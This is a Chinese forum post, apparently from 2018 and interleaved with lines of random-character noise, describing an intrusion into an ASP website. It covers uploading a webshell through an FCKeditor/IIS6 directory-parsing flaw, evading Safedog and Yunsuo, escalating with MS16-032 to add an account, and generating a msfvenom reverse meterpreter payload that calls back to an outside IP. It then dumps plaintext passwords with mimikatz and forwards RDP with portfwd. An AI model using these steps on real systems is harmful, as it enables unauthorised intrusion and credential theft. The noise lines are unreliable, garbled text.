|
3 k( U, z" |# j+ ~1 a
6 F9 Y6 ?( F0 L0 R0 E; v0 l 0 }* K% \: v3 ?) ^0 }( h
6 [9 S7 a1 F* X; v- E: u. j0 m0 [
|
! x! F9 U! P6 u7 _9 @ 2 I+ U+ n5 s- ~! X# n9 G$ p3 R
# L! r& h) e. \% Z% E
一、 利用getwebshell篇
0 a: T) u0 N! ?# D6 l6 {" a
- {( C" [' y0 P& p" i; m首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
2 C8 N+ W5 h! A' H" e
8 y, i x# }6 r: N( E$ `7 _9 M3 \
% n* K/ u5 B% L9 }/ X
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
: W" T1 w/ I* L) `3 p, p- P7 l
_5 u) L) _' Q8 M O
下面我们构造一个asp目录,如: 3 j3 g& T5 d- d( Y9 d, I; Z* ^
" y9 P$ A4 g$ T# ~
! O- A& I3 L# D) F2 A http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 : t1 v Q. d" m+ U& }: W) E
' b, D8 i: q, V
& e5 l& j( n& Q# a7 l
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
1 |" ~# o- q/ b6 P
9 I6 m) F8 F7 e; y2 ^1 u
一、 绕过安全狗云锁提权并且加账号
4 H0 y, c3 L# U! W6 U) R
' I9 O5 G. w% l$ `4 I. r- l6 |没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
s& A" ~3 t' J% J$ ~
4 v2 C* |! o P# Z; w如图:
2 k+ ^; J$ T6 }; Z
9 o. E- m: O2 B3 z- O1 L+ T/ U然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
; h# d2 M g5 Z+ M3 \6 Z$ ]
/ |! Z! x; U9 \; q一、 利用metasploit
7 `- a8 j: X* l, K# M$ r6 j
, x- ~% P G ]# T) _, j
首先用pentestbox生成一个64位的payload如下命令
u4 F; h6 i. m7 L
! T+ }+ W6 I$ d& t( rmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
0 \+ i. m6 o2 ~& b& W
9 s# w, x0 _$ I- i3 ^7 h为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
0 ^3 E& H1 _0 `4 X% a( _% @
% I, p; S7 K5 O1 \! T
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
/ a `% p8 g8 g! R7 Y
% a+ U- V" q: F) B
下面我们来做一个监听如下命令:
( T$ A2 ~& W* C& q8 F- S3 E
0 b- C* N/ K) g6 X2 {portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
, \+ p0 ^& f6 h: |0 n) n ( q4 A3 P( X' {; |
1 _0 B' h, G1 |! s
| Z; W) m' M0 n( h
6 F% U5 D6 I8 d* e( ^/ s
- A- _( |( J/ f# u1 S. C4 Q) f 4 k& ^' f/ u: J! Y7 S" Q
! X4 `' e4 B- m0 Q0 _4 x6 `* H4 ^
& g- H0 Y8 V* i# X! o2 [
" \+ Q( n2 F) |5 r; n( D" d1 l" P
$ o4 F2 m8 T% ?: L1 ^
5 o9 z$ e- o1 }/ O4 @* a" |
: b/ y* c/ A1 B" g+ J
7 T, p$ T; Q8 ~: ~8 ]; T/ m+ r: \
6 O& E4 \" X2 g! j- B) ?: d0 Y; u! i; G7 c/ h
3 c6 D6 W& q% w1 w3 ]% r
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06